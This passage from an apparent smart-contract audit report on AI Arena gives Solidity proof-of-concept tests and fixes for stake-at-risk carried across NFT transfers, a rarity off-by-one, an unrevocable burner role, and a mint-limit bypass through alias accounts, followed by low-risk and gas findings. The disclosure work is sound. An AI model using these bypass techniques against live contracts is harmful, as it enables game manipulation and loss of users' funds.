    _rankedBattleContract.updateBattleRecord(tokenId, 50, 0, 1500, true);


function testPoC2() public {
    address seller = vm.addr(3);
    address buyer = vm.addr(4);
    uint256 stakeAmount = 3_000 * 10 ** 18;
    uint256 expectedStakeAtRiskAmount = (stakeAmount * 100) / 100000;
    uint256 tokenId = 0;
    assertEq(_fighterFarmContract.ownerOf(tokenId), seller);
    _rankedBattleContract.stakeNRN(stakeAmount, tokenId);
    assertEq(_rankedBattleContract.amountStaked(tokenId), stakeAmount);
    // loses battle
    _rankedBattleContract.updateBattleRecord(tokenId, 50, 2, 1500, true);
    assertEq(_stakeAtRiskContract.stakeAtRisk(0, tokenId), expectedStakeAtRiskAmount);

    // seller unstake and sell NFT to buyer
    _rankedBattleContract.unstakeNRN(_rankedBattleContract.amountStaked(tokenId), tokenId);
    _fighterFarmContract.transferFrom(seller, buyer, tokenId);

    // The buyer have new NFT and loses with it
    uint256 stakeAmount_buyer = 3_500 * 10 ** 18;
    uint256 expectedStakeAtRiskAmount_buyer = (stakeAmount_buyer * 100) / 100000;

    uint256 tokenId_buyer = 1;
    assertEq(_fighterFarmContract.ownerOf(tokenId_buyer), buyer);

    _rankedBattleContract.stakeNRN(stakeAmount_buyer, tokenId_buyer);
    assertEq(_rankedBattleContract.amountStaked(tokenId_buyer), stakeAmount_buyer);

    // buyer loses with tokenId_buyer
    _rankedBattleContract.updateBattleRecord(tokenId_buyer, 50, 2, 1500, true);
    assertEq(_stakeAtRiskContract.stakeAtRisk(0, tokenId_buyer), expectedStakeAtRiskAmount_buyer);
    assertGt(expectedStakeAtRiskAmount_buyer, expectedStakeAtRiskAmount, "buyer has more StakeAtRisk");

    // buyer win with bought NFT (tokenId 0)
    for(uint256 i = 0; i < 1000; i++){
        _rankedBattleContract.updateBattleRecord(tokenId, 50, 0, 1500, false);

    assertEq(_stakeAtRiskContract.stakeAtRisk(0, tokenId), 0); // Reclaimed all stakeAtRisk of bought NFT(token 0)
    assertEq(_stakeAtRiskContract.stakeAtRisk(0, tokenId_buyer), expectedStakeAtRiskAmount_buyer); // tokenId_buyer stakeAtRisk remains
    assertEq(_stakeAtRiskContract.amountLost(buyer), expectedStakeAtRiskAmount_buyer - expectedStakeAtRiskAmount, "remain StakeAtRisk");

    // the remain StakeAtRisk cannot be reclaimed even if buyer win with tokenId_buyer(token 1)
    // and the win result of token 1 cannot be saved at onchain
    vm.expectRevert(abi.encodeWithSignature("Panic(uint256)", 0x11)); // expect arithmeticError (underflow)
    _rankedBattleContract.updateBattleRecord(tokenId_buyer, 50, 0, 1500, false);

function testPoC3() public {
    address seller = vm.addr(3);
    address buyer = vm.addr(4);
    uint256 stakeAmount = 3_000 * 10 ** 18;
    uint256 expectedStakeAtRiskAmount = (stakeAmount * 100) / 100000;

    // The buyer have new NFT and loses with it
    uint256 stakeAmount_buyer = 300 * 10 ** 18;
    uint256 expectedStakeAtRiskAmount_buyer = (stakeAmount_buyer * 100) / 100000;

    uint256 tokenId_buyer = 0;
    assertEq(_fighterFarmContract.ownerOf(tokenId_buyer), buyer);

    _rankedBattleContract.stakeNRN(stakeAmount_buyer, tokenId_buyer);
    assertEq(_rankedBattleContract.amountStaked(tokenId_buyer), stakeAmount_buyer);

    // buyer loses with tokenId_buyer
    _rankedBattleContract.updateBattleRecord(tokenId_buyer, 50, 2, 1500, true);

    assertEq(_stakeAtRiskContract.stakeAtRisk(0, tokenId_buyer), expectedStakeAtRiskAmount_buyer);
    assertGt(expectedStakeAtRiskAmount, expectedStakeAtRiskAmount_buyer, "seller's token has more StakeAtRisk");

    // round 0 passed
    // tokenId_buyer's round 0 StakeAtRisk is reset
    assertEq(_stakeAtRiskContract.stakeAtRisk(1, tokenId_buyer), 0);

    // seller mint token, lose battle and sell the NFT
    uint256 tokenId = 1;
    assertEq(_fighterFarmContract.ownerOf(tokenId), seller);
    _rankedBattleContract.stakeNRN(stakeAmount, tokenId);
    assertEq(_rankedBattleContract.amountStaked(tokenId), stakeAmount);
    // loses battle
    _rankedBattleContract.updateBattleRecord(tokenId, 50, 2, 1500, true);
    assertEq(_stakeAtRiskContract.stakeAtRisk(1, tokenId), expectedStakeAtRiskAmount);

    // seller unstake and sell NFT to buyer
    _rankedBattleContract.unstakeNRN(_rankedBattleContract.amountStaked(tokenId), tokenId);
    _fighterFarmContract.transferFrom(seller, buyer, tokenId);

    // buyer win with bought NFT (tokenId 0)
    for(uint256 i = 0; i < 100; i++){
        _rankedBattleContract.updateBattleRecord(tokenId, 50, 0, 1500, false);

    assertEq(_stakeAtRiskContract.stakeAtRisk(1, tokenId), expectedStakeAtRiskAmount - expectedStakeAtRiskAmount_buyer); // Reclaimed all stakeAtRisk of bought NFT(token 1)
    assertEq(_stakeAtRiskContract.stakeAtRisk(1, tokenId_buyer), 0);
    assertEq(_stakeAtRiskContract.amountLost(buyer), 0, "reclaimed old lost");

    // and the win result of token 1 cannot be saved at onchain anymore
    vm.expectRevert(abi.encodeWithSignature("Panic(uint256)", 0x11)); // expect arithmeticError (underflow)
    _rankedBattleContract.updateBattleRecord(tokenId, 50, 0, 1500, false);


Tokens with a remaining StakeAtRisk should not be allowed to be exchanged.

function unstakeNRN(uint256 amount, uint256 tokenId) external {
    require(_fighterFarmInstance.ownerOf(tokenId) == msg.sender, "Caller does not own fighter");
    if (amount > amountStaked[tokenId]) {
        amount = amountStaked[tokenId];
    amountStaked[tokenId] -= amount;
    globalStakedAmount -= amount;
    stakingFactor[tokenId] = _getStakingFactor(
    _calculatedStakingFactor[tokenId][roundId] = true;
    hasUnstaked[tokenId][roundId] = true;
    bool success = _neuronInstance.transfer(msg.sender, amount);
    if (success) {
-       if (amountStaked[tokenId] == 0) {
+       if (amountStaked[tokenId] == 0 && _stakeAtRiskInstance.getStakeAtRisk(tokenId) == 0) {
            _fighterFarmInstance.updateFighterStaking(tokenId, false);
        emit Unstaked(msg.sender, amount);

hickuphh3 (judge) decreased severity to Medium and commented:

See comment on this vulnerability in the initial primary issue #1641.

brandinho (AI Arena) confirmed

AI Arena mitigated:

Status: Not fully mitigated. Full details in report from d3e4, and also included in the Mitigation Review section below.

[M-07] Erroneous probability calculation in physical attributes can lead to significant issues

Submitted by haxatron, also found by juancito, BARW, fnanni, and DanielArmstrong

To determine what physical attributes a user gets first we obtain a rarityRank which is computed from the DNA.


                } else {
                    uint256 rarityRank = (dna / attributeToDnaDivisor[attributes[i]]) % 100;
                    uint256 attributeIndex = dnaToIndex(generation, rarityRank, attributes[i]);
                    finalAttributeProbabilityIndexes[i] = attributeIndex;

Here since we use % 100 operation is used, the range of rarityRank would be [0,99].

This rarityRank is used in the dnaToIndex to determine the final attribute of the part.


     /// @dev Convert DNA and rarity rank into an attribute probability index.
     /// @param attribute The attribute name.
     /// @param rarityRank The rarity rank.
     /// @return attributeProbabilityIndex attribute probability index.
    function dnaToIndex(uint256 generation, uint256 rarityRank, string memory attribute) 
        returns (uint256 attributeProbabilityIndex) 
        uint8[] memory attrProbabilities = getAttributeProbabilities(generation, attribute);
        uint256 cumProb = 0;
        uint256 attrProbabilitiesLength = attrProbabilities.length;
        for (uint8 i = 0; i < attrProbabilitiesLength; i++) {
            cumProb += attrProbabilities[i];
            if (cumProb >= rarityRank) {
                attributeProbabilityIndex = i + 1;
        return attributeProbabilityIndex;

There is however, a very subtle bug in the calculation above due to the use of cumProb >= rarityRank as opposed to cumProb > rarityRank.

To explain the above, I will perform a calculation using a simple example. Let’s say we only have 2 possible attributes and the attrProbabilities is [50, 50].

  1. First iteration, when i = 0, we have cumProb = 50, for the if (cumProb >= rarityRank) to be entered the range of values rarityRank can be is [0, 50]. Therefore there is a 51% chance of obtaining this attribute
  2. Next iteration, when i = 1, we have cumProb = 100, for the if (cumProb >= rarityRank) to be entered the range of values rarityRank can be is [51, 99]. Therefore there is a 49% chance of obtaining this attribute.

This means that for values in the first index, the probability is 1% greater than intended and for values in the last index the probability is 1% lesser than intended. This can be significant in certain cases, let us run through two of them.

Case 1: The first value in attrProbabilities is 1.

If the first value in attrProbabilities is 1. Let’s say [1, 99].

Then in reality if we perform the calculation above we get the following results:

  1. First iteration, when i = 0, we have cumProb = 1, for the if (cumProb >= rarityRank) to be entered the range of values rarityRank can be is [0, 1]. Therefore there is a 2% chance of obtaining this attribute
  2. Next iteration, when i = 1, we have cumProb = 100, for the if (cumProb >= rarityRank) to be entered the range of values rarityRank can be is [2, 99]. Therefore there is a 98% chance of obtaining this attribute.

Then we have twice the chance of getting the rarer item, which would make it twice as common, thus devaluing it.

Case 2: The last value in attrProbabilities is 1.

If the last value in attrProbabilities is 1. Let’s say [99, 1].

Then in reality if we perform the calculation above we get the following results:

  1. First iteration, when i = 0, we have cumProb = 99, for the if (cumProb >= rarityRank) to be entered the range of values rarityRank can be is [0, 99]. Therefore we will always enter the if (cumProb >= rarityRank) block.

Then it would be impossible (0% chance) to obtain the 1% item.

It should be cumProb > rarityRank. Going back to our example of [50, 50], if it were cumProb > rarityRank. Then we will get the following results:

  1. First iteration, when i = 0, we have cumProb = 50, for the if (cumProb > rarityRank) to be entered the range of values rarityRank can be is [0, 49]. Therefore there is a 50% chance of obtaining this attribute
  2. Next iteration, when i = 1, we have cumProb = 100, for the if (cumProb > rarityRank) to be entered the range of values rarityRank can be is [50, 99]. Therefore there is a 50% chance of obtaining this attribute.

Thus the above recommended mitigation is correct.

hickuphh3 (judge) commented:

Valid issue: wrong inclusion of boundary skews the probability to one-side by 1%.
The shift in probabilities will affect trait generation, which affects fighter valuations.

Note: For full discussion, see here.

[M-08] Burner role cannot be revoked

Submitted by Timenov, also found by 0x11singh99, vnavascues, MrPotatoMagic, Rolezn, merlinboii (1, 2), btk, andywer, 0xblackskull, josephdara, CodeWasp, MidgarAudits, Sabit, SovaSlava, lil_eth, and sobieski

In GameItems::setAllowedBurningAddresses the admin can update the allowedBurningAddresses mapping.

    function setAllowedBurningAddresses(address newBurningAddress) public {
        allowedBurningAddresses[newBurningAddress] = true;

This mapping is used to check if the msg.sender has permission to burn specific amount of game items from an account. This can happen through the burn function.

    function burn(address account, uint256 tokenId, uint256 amount) public {
        _burn(account, tokenId, amount);

However setAllowedBurningAddresses() works only one way. I mean that the admin can give permission, but not revoke it.

Proof of Concept

Imagine the following scenario. Admin calls setAllowedBurningAddresses with wrong address. Now this address has the permission to burn any token from any user. Now no one can remove the wrong address from the mapping.

Use adjustAdminAccess function as an example:

    function adjustAdminAccess(address adminAddress, bool access) external {
        require(msg.sender == _ownerAddress);
        isAdmin[adminAddress] = access;

So the new setAllowedBurningAddresses function should look something like this:

    function adjustBurningAccess(address burningAddress, bool access) public {
        allowedBurningAddresses[burningAddress] = access;

Now even if the admin sets the wrong address, he can immediately change it.

hickuphh3 (judge) decreased severity to Medium and commented:

Similar to M-02, but the root causes are different even though the effect is the same.

AI Arena mitigated:

Status: Not fully mitigated. Full details in report from d3e4, and also included in the Mitigation Review section below.

[M-09] Constraints of dailyAllowanceReplenishTime and allowanceRemaining during mint() can be bypassed by using alias accounts & safeTransferFrom()

Submitted by t0x1c, also found by visualbits, MrPotatoMagic, 0xDetermination, MatricksDeCoder, Greed, givn, VAD37, MidgarAudits, Shubham, PedroZurdo, forkforkdog, Draiakoo, 0xCiphky, lil_eth, Velislav4o, ladboy233, cats (1, 2), lanrebayode77, djxploit, Kalogerone, zaevlad, btk, ZanyBonzy, and SpicyMeatball

The mint() function in GameItems.sol constraints a user from minting more than 10 game items in 1 day. This constraint can easily be bypassed since a similar check is missing inside the safeTransferFrom() function:

  File: src/GameItems.sol

  147:              function mint(uint256 tokenId, uint256 quantity) external {
  148:                  require(tokenId < _itemCount);
  149:                  uint256 price = allGameItemAttributes[tokenId].itemPrice * quantity;
  150:                  require(_neuronInstance.balanceOf(msg.sender) >= price, "Not enough NRN for purchase");
  151:                  require(
  152:                      allGameItemAttributes[tokenId].finiteSupply == false || 
  153:                      (
  154:                          allGameItemAttributes[tokenId].finiteSupply == true && 
  155:                          quantity <= allGameItemAttributes[tokenId].itemsRemaining
  156:                      )
  157:                  );
  158: @--->            require(
  159: @--->                dailyAllowanceReplenishTime[msg.sender][tokenId] <= block.timestamp || 
  160: @--->                quantity <= allowanceRemaining[msg.sender][tokenId]
  161:                  );
  163:                  _neuronInstance.approveSpender(msg.sender, price);
  164:                  bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, price);
  165:                  if (success) {
  166:                      if (dailyAllowanceReplenishTime[msg.sender][tokenId] <= block.timestamp) {
  167:                          _replenishDailyAllowance(tokenId);
  168:                      }
  169:                      allowanceRemaining[msg.sender][tokenId] -= quantity;
  170:                      if (allGameItemAttributes[tokenId].finiteSupply) {
  171:                          allGameItemAttributes[tokenId].itemsRemaining -= quantity;
  172:                      }
  173:                      _mint(msg.sender, tokenId, quantity, bytes("random"));
  174:                      emit BoughtItem(msg.sender, tokenId, quantity);
  175:                  }
  176:              }

Missing check:

  File: src/GameItems.sol

  291:              function safeTransferFrom(
  292:                  address from, 
  293:                  address to, 
  294:                  uint256 tokenId,
  295:                  uint256 amount,
  296:                  bytes memory data
  297:              ) 
  298:                  public 
  299:                  override(ERC1155)
  300:              {
  301:                  require(allGameItemAttributes[tokenId].transferable);
  302:                  super.safeTransferFrom(from, to, tokenId, amount, data);
  303:              }

Note: This could also lead to a situation where a NRN whale having enough funds can buy the complete supply of the game items within minutes by using his multiple alias accounts.

Proof of Concept

  • Alice (ownerAddress) buys 10 batteries. She can’t buy anymore until 1 day has passed.
  • Alice transfers some of her NRN to Bob (Alice’s alternate account).
  • Bob buys 10 batteries and transfers them to Alice, bypassing the constraints.

Add the following inside test/GameItems.t.sol and run with forge test --mt test_MintGameItems_FromMultipleAccs_ThenTransfer -vv:

    function test_MintGameItems_FromMultipleAccs_ThenTransfer() public {
        // _ownerAddress's alternate account
        address aliasAccount1 = makeAddr("aliasAccount1");

        _fundUserWith4kNeuronByTreasury(_ownerAddress);, 10); //paying 10 $NRN for 10 batteries
        assertEq(_gameItemsContract.balanceOf(_ownerAddress, 0), 10);
        // transfer some $NRN to alias Account
        _neuronContract.transfer(aliasAccount1, 10 * 10 ** 18);

        vm.startPrank(aliasAccount1);, 10); //paying 10 $NRN for 10 batteries
        assertEq(_gameItemsContract.balanceOf(aliasAccount1, 0), 10);

        // transfer these game items to _ownerAddress
        _gameItemsContract.safeTransferFrom(aliasAccount1, _ownerAddress, 0, 10, "");

        assertEq(_gameItemsContract.balanceOf(_ownerAddress, 0), 20);

Tools used


Add the same check inside safeTransferFrom() too:

  File: src/GameItems.sol

  291:              function safeTransferFrom(
  292:                  address from, 
  293:                  address to, 
  294:                  uint256 tokenId,
  295:                  uint256 amount,
  296:                  bytes memory data
  297:              ) 
  298:                  public 
  299:                  override(ERC1155)
  300:              {
  301:                  require(allGameItemAttributes[tokenId].transferable);
+                       require(dailyAllowanceReplenishTime[to][tokenId] <= block.timestamp || amount <= allowanceRemaining[to][tokenId], "Cannot bypass constraints via alias accounts");  
  302:                  super.safeTransferFrom(from, to, tokenId, amount, data);
  303:              }

hickuphh3 (judge) commented:

Agree with the issue. The main impact is about bypassing replenishing / minting limits for a specific account by minting batteries / redeeming passes with multiple accounts & transferring all to that 1 account for consumption || transferring fighter NFTs back and forth across multiple wallets.

Low Risk and Non-Critical Issues

For this audit, 60 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by givn received the top score from the judge.

The following wardens also submitted reports: 0xDetermination, radev_sw, Aamir, lsaudit, peter, rspadi, MrPotatoMagic, vnavascues, AlexCzm, 0xMosh, nuthan2x, PetarTolev, 0xAkira, 7ashraf, rekxor, Blank_Space, juancito, ZanyBonzy, KmanOfficial, 0x11singh99, 0xStriker, DarkTower, DeFiHackLabs, yovchev_yoan, 14si2o_Flint, McToady, immeas, alexzoid, agadzhalov, 0xmystery, 0xBinChook, Bube, forkforkdog, SHA_256, BARW, merlinboii, BigVeezus, offside0011, klau5, Krace, EagleSecurity, oualidpro, kartik_giri_47538, swizz, btk, Rolezn, Tekken, BenasVol, shaflow2, dimulski, jesjupyter, Bauchibred, shaka, cartlex_, yotov721, Timenov, boredpukar, SpicyMeatball, and haxatron.

[01] Improve security posture of _delegatedAddress in FighterFarm.sol

The _delegatedAddress field represents the backend’s address, responsible for signing various messages related to claimFighters . There are two issues with it, which increase the risk for the protocol.

  1. _delegatedAddress is being set only once, in the constructor, and there is no check if its address(0). In the off-chance of this value being misconfigured any signature would be able to mint a fighter.
  2. In the event of a security breach on the backend, there is no way to change the _delegatedAddress. This means a hacker could mint as many and whatever kind of fighter they would like.

Suggested mitigation

  • Add require check in FighterFarm’s constructor

  • require(_delegatedAddress != address(0), “Invalid delegated address”);

  • Add setDelegatedAddress(address) external function, which should be callable only by the owner, similar to the already existing setMergingPoolAddress(address).

[02] Missing functions to change the treasury in various contracts

The treasuryAddress receives an initial mint of NRN and subsequently smaller transfers of the currency.

In the situation of a security breach, protocol ownership change or some other unforeseen events it could be troublesome that the treasury address can’t change. A fallback mechanism is necessary, just like one exists for changing the owner.

Suggested mitigation Either add setTreasury(address) function, callable only by the owner, in the following contracts:

  • FighterFarm.sol
  • GameItems.sol
  • Neuron.sol
  • StakeAtRisk.sol

Or make all of them reference the treasury from the Neuron contract, since they all have a reference to it, and have setTreasury(address) only in Neuron.sol.

[03] Missing checks for game item invariants when calling createGameItem

It is possible for an item to have infinite supply (finiteSupply == false) and have itemsRemaining > 0.


if(finiteSupply && itemsRemaining > 0) {
  revert("Conflicting item parameters");

[04] There are no functions for adjusting GameItemAttributes

In the event of misconfigured item, promotions/discounts, balance adjustments a new item with the same name needs to be created. Adding function to update parameter/s is going to make resolution of such situations straight-forward.

[05] getFighterPoints view function is unusable

The getFighterPoints function is created as a helper, to produce a list of the fighters’ points. The issue with it is that it allocates the resulting array with only 1 item. This makes it impossible to use for any practical purposes, because client code would be interested in more fighters than the first one.

Another concern with the function is that it could become impossible to use if enough fighters are created. A big enough array would DoS the function. Consider providing it with a range of indices.

In this way you would limit the return data.


function testIndexOOB() public {
  address user1 = makeAddr("user1");
  address user2 = makeAddr("user2");

  _mergingPoolContract.addPoints(0, 100);
  _mergingPoolContract.addPoints(1, 100);
  _mergingPoolContract.addPoints(2, 100);
  assertEq(_mergingPoolContract.totalPoints(), 300);
  // fighter points contains values for 3 fighters, but when we ask for 2 or 3, it fails
  uint256[] memory fighterPoints = _mergingPoolContract.getFighterPoints(2);
  assertEq(fighterPoints.length, 2);

[06] Misleading function names in FighterFarm.sol

The following functions should be renamed: instantiateAIArenaHelperContract to setAIArenaHelperContract instantiateMintpassContract to setMintpassContract instantiateNeuronContract to setNeuronContract

Since they are not actually instantiating anything, set would be a more appropriate prefix. Just like it is done in setMergingPoolAddress and setTokenURI.

[07] Extract constant for custom attributes in FighterFarm.sol

As mentioned by the developers the value 100 is used for custom attributes:

guppy — 02/11/2024 3:50 PM 100 is a flag we use to determine if it’s a custom attribute or not

To avoid sprinkling literals in the codebase and improve it’s readability it is recommended to extract this literal to a constant, something like this:

/// @notice Special value for custom attributes
uint256 private constant CUSTOM_ATTRIBUTE = 100

And replacing it in the following lines: here, here and here.

[08] Rename dendroidBool to isDendroid

Variable containing its type is redundant in statically typed languages. is prefix is common convention for boolean values.

Alternatively, replace the value with uint8 fighterType.

[09] Fix misleading function name and natspec in GameItems.sol

The function instantiateNeuronContract should be renamed to setNeuronContract, because it conveys what the function actually does.

Additionally, update the comment, to be more accurate:

- /// @notice Sets the Neuron contract address and instantiates the contract.
+ /// @notice Sets the Neuron contract address.

[10] Send zero bytes as data argument when minting

It’s unusual to have an arbitrary string as the data parameter of the _mint function. Replace bytes("random") with "0x"

[11] Missing notice tag in natspec for variables in MergingPool.sol

- /// The address that has owner privileges (initially the contract deployer).
+ /// @notice The address that has owner privileges (initially the contract deployer).
address _ownerAddress;

- /// The address of the ranked battle contract.
+ /// @notice The address of the ranked battle contract.
address _rankedBattleAddress;

Default tag is @notice, but it’s nice to be consistent with the other natspecs.

[12] Incorrect doc string for variable in MergingPool.sol

- /// @notice Mapping of address to fighter points.
+ /// @notice Mapping of fighterId to fighter points.
mapping(uint256 => uint256) public fighterPoints;

[13] Common setup code in tests can be extracted to a base class

Currently, there is a lot of duplicated setup code and variables in the tests. See the setup of:

  • AiArenaHelper.t.sol
  • FighterFarm.t.sol
  • MergingPool.t.sol
  • RankedBattle.t.sol
  • StakeAtRisk.t.sol
  • VoltageManager.t.sol

This can be avoided by creating a Base contract that contains common setup and then each Test contract will do only its own specific configuration.

[14] Misleading function names in RankedBattle.sol

Rename instantiateNeuronContract to setNeuronContract, to reflect what the function is actually doing. Update the natspec:

- /// @notice Instantiates the neuron contract.
+ /// @notice Sets the neuron contract.

Rename instantiateMergingPoolContract to setMergingPoolContract, to reflect what the function is actually doing. Update the natspec:

- /// @notice Instantiates the merging pool contract.
+ /// @notice Sets the merging pool contract.

Rename setNewRound() to beginNewRound(). As prefix set implies the caller will specify a roundId, which is not the case. The function actually increments the roundId.

[15] Improvements to updateBattleRecord function

Create a BattleResult enum and use it instead of uint8. This will improve the code readability. It will be easy to understand if we’re looking in the case of a win and additional comments like /// If the user won the match will become unnecessary, as the code will be self-documenting.

+ enum BattleResult {
+   win,
+   tie,
+   loss
+ }

function updateBattleRecord(
- uint8 battleResult,
+ BattleResult battleResult,

Rename updateBattleRecord parameter:

function updateBattleRecord(
- bool initiatorBool,
+ bool isInitiator,

It will convey better the purpose of the variable.

[16] Simplify assert statements

Some assert statements are being unnecessarily complicated, there are overloads that support all cases for comparison of native types. Using the correct APIs increases the readability and expressiveness of code. There are many instances where assert calls can be improved, below I have outlined some general examples.

In the following lines, the == operator can be omitted:

- assertEq(_mergingPoolContract.winnerAddresses(0, 0) == _ownerAddress, true);
+ assertEq(_mergingPoolContract.winnerAddresses(0, 0), _ownerAddress);

- assertEq(mintPass.totalSupply() == mintPass.numTokensOutstanding(), true);
+ assertEq(mintPass.totalSupply(), mintPass.numTokensOutstanding());

Here a specialised assert can be used:

- assertEq(mintPass.mintingPaused(), true);
+ assertTrue(mintPass.mintingPaused());

See forge-std/lib/ds-test/src/test.sol for all assert overloads.

Avoid using the Solidity native assert statement, when you can use the APIs from Forge:

- assert(_helperContract.attributeToDnaDivisor("head") != 99);
+ assertNotEq(_helperContract.attributeToDnaDivisor("head"), 99);

[17] Consider replacing decimal multiplier with ether keyword

Since ether contains 18 decimals it is possible to use the ether keyword when describing NRN values. It is shorter and conveys the amount just as well.


- uint256 stakeAmount = 3_000 * 10 ** 18;
+ uint256 stakeAmount = 3_000 ether;

A simple string replace will update all instances correctly, with the exception of 1, which is easy to do manually.

[18] Players lose their current voltage when using a battery

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.

When players deplete their voltage through battles, they have the option to replenish it using a voltage battery. Although the maximum voltage capacity is 100, and each battle reduces it by 10, the useVoltageBattery() function resets the voltage to 100, disregarding any remaining voltage a player has.

ownerVoltage[msg.sender] = 100;

From a design point of view it looks good to have the number 100 as max and 0 as min value for voltage. But in this situation it is doing players a disservice.

Root cause

The core issue arises from the function overwriting the existing voltage value instead of incrementally adding to it.


Voltage batteries, as valuable paid items, enable more frequent participation in ranking matches. However, players risk losing up to 90% of their replenished voltage due to the current implementation, leading to potential losses in NRN (the game’s currency).


Should a player replenish their voltage without checking their current level, they risk using a battery without receiving its full value, thereby not maximizing the item’s cost-effectiveness.

Proof of Concept

In VoltageManager.t.sol:

function testLoseVoltageFromBattery() public {
  address player = _ownerAddress;
  uint8 voltageSpendAmount = 10;
  uint256 currentVoltage = _voltageManagerContract.ownerVoltage(player);
  assertEq(currentVoltage, 0);

  // battery gives full 100 voltage
  _voltageManagerContract.spendVoltage(player, voltageSpendAmount);
  assertEq(_voltageManagerContract.ownerVoltage(player), 100 - voltageSpendAmount); // 10 voltage just spent

  // Call use battery again, for whatever reason
  // battery gave only 10 voltage
  assertEq(_voltageManagerContract.ownerVoltage(player), 100);

Suggested Mitigation

Modify the function to add the voltage battery’s value to the existing voltage, rather than resetting it:

function useVoltageBattery() public {
- ownerVoltage[msg.sender] = 100;
+ ownerVoltage[msg.sender] += 100;

hickuphh3 (judge) commented:

01: Good, refactor (explained the impact) 02: Refactor 03: Refactor 04: Refactor 05: Low 06: Refactor 07: Non-critical 08: Refactor 09/14: Refactor/Non-critical 10: Refactor 11/12: Low/Refactor 13: Refactor/Non-critical 15: Refactor 16: Non-critical 17: Non-critical 18: Low

Overall very good and targeted recommendations, found them rather meaningful.

brandinho (AI Arena) acknowledged

Gas Optimizations

For this audit, 36 reports were submitted by wardens detailing gas optimizations. The report highlighted below by 0xDetermination received the top score from the judge.

The following wardens also submitted reports: 0x11singh99, K42, mikesans, hunter_w3b, SY_S, SAQ, SM3_SS, PetarTolev, shamsulhaq123, donkicha, favelanky, dharma09, rekxor, unique, MatricksDeCoder, McToady, Raihan, yashgoel72, yovchev_yoan, ahmedaghadi, lrivo, 0xAnah, al88nsk, merlinboii, offside0011, lsaudit, peter, emrekocak, oualidpro, ziyou-, Timenov, judeabara, 0xRiO, kiqo, and JcFichtner.


Issue number Description
[G-01] Neuron.claim() allowance check is not necessary because transferFrom() also checks allowance
[G-02] Neuron.claim() can call code in transferFrom() implementation directly instead of calling transferFrom()
[G-03] Neuron.burnFrom() allowance check is not necessary
[G-04] RankedBattle._getStakingFactor() accesses the same storage variable a second time whenever it’s called (in stakeNRN(), unstakeNRN(), and updateBattleRecord())
[G-05] NRN success checks are unnecessary because the OZ implementation will not fail without reverting
[G-06] RankedBattle.claimNRN() is gas inefficient for addresses that don’t have any points in previous rounds
[G-07] RankedBattle.updateBattleRecord() doesn’t need to check voltage since VoltageManager.spendVoltage() will revert if voltage is too low
[G-08] RankedBattle._addResultPoints() can put code inside an existing conditional statement to avoid incrementing storage variables by zero
[G-09] RankedBattle._addResultPoints() executes unnecessary lines of code in case of a tie
[G-10] Unnecessary equality comparison in RankedBattle._updateRecord()
[G-11] FighterFarm.sol inherits ERC721Enumerable but the codebase doesn’t use any of the enumerable methods
[G-12] Balance check in FighterFarm.reRoll() is not necessary since transferFrom() will revert in case of insufficient balance
[G-13] FighterFarm._beforeTokenTransfer() can be deleted to save an extra function call
[G-14] FighterFarm._createFighterBase() performs unnecessary check when minting dendroid
[G-15] MergingPool.claimRewards() should update numRoundsClaimed after the loop ends instead of incrementing it in every loop
[G-16] MergingPool.pickWinner() and MergingPool.claimRewards() can be refactored so that users don’t have to iterate through the entire array of winners for every round
[G-17] DNA rarity calculation in AiArenaHelper.dnaToIndex() can be redesigned to save gas
[G-18] AiArenaHelper.createPhysicalAttributes() should check for iconsType before running icons-relevant code since icons fighters are rare
[G-19] AiArenaHelper constructor sets probabilities twice

[G-01]Neuron.claim() allowance check is not necessary because transferFrom() also checks allowance



The require statement below can be removed since transferFrom() will check/update the allowance.

    function claim(uint256 amount) external {
            allowance(treasuryAddress, msg.sender) >= amount, 
            "ERC20: claim amount exceeds allowance"
        transferFrom(treasuryAddress, msg.sender, amount);
        emit TokensClaimed(msg.sender, amount);

Delete the require statement.

[G-02] Neuron.claim() can call code in transferFrom() implementation directly instead of calling transferFrom()


See the OZ transferFrom() implementation:

    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;

Neuron.claim() can run the above code directly without spending extra gas for the function call and to cache msg.sender.

    function claim(uint256 amount) external {
            allowance(treasuryAddress, msg.sender) >= amount, 
            "ERC20: claim amount exceeds allowance"
-       transferFrom(treasuryAddress, msg.sender, amount);
+       _spendAllowance(treasuryAddress, msg.sender, amount);
+       _transfer(treasuryAddress, msg.sender, amount);
        emit TokensClaimed(msg.sender, amount);

[G-03] Neuron.burnFrom() allowance check is not necessary


Note below that if the amount exceeds the allowance, the decreasedAllowance calculation will underflow and cause a revert. The require allowance check can be removed.

    function burnFrom(address account, uint256 amount) public virtual {
            allowance(account, msg.sender) >= amount, 
            "ERC20: burn amount exceeds allowance"
        uint256 decreasedAllowance = allowance(account, msg.sender) - amount;
        _burn(account, amount);
        _approve(account, msg.sender, decreasedAllowance);

Remove the require statement.

[G-04] RankedBattle._getStakingFactor() accesses the same storage variable a second time whenever it’s called (in stakeNRN(), unstakeNRN(), and updateBattleRecord())


RankedBattle._getStakingFactor() accesses the storage variable amountStaked[tokenId] after the three mentioned functions access the same variable (see links). This variable should be cached to decrease storage reads and gas costs.

Cache amountStaked[tokenId] and pass it to _getStakingFactor().

[G-05] NRN success checks are unnecessary because the OZ implementation will not fail without reverting


The pattern in the link provided (checking for NRN transfer success) is used widely in the codebase, but these checks are unnecessary since transfers won’t fail without reverting.

Remove the NRN success checks.

[G-06] RankedBattle.claimNRN() is gas inefficient for addresses that don’t have any points in previous rounds


The for loop in claimNRN() will start at zero for new users and spend thousands of gas accessing/setting storage in each loop, although the user will not have any rewards in earlier rounds.

    function claimNRN() external {
        require(numRoundsClaimed[msg.sender] < roundId, "Already claimed NRNs for this period");
        uint256 claimableNRN = 0;
        uint256 nrnDistribution;
        uint32 lowerBound = numRoundsClaimed[msg.sender];
        for (uint32 currentRound = lowerBound; currentRound < roundId; currentRound++) {
            nrnDistribution = getNrnDistribution(currentRound);
            claimableNRN += (
                accumulatedPointsPerAddress[msg.sender][currentRound] * nrnDistribution   
            ) / totalAccumulatedPoints[currentRound];
            numRoundsClaimed[msg.sender] += 1;

Allow users to set their numRoundsClaimed to an arbitrary value.

[G-07] RankedBattle.updateBattleRecord() doesn’t need to check voltage since VoltageManager.spendVoltage() will revert if voltage is too low


updateBattleRecord() checks that the initiator’s voltage is sufficient:

            !initiatorBool ||
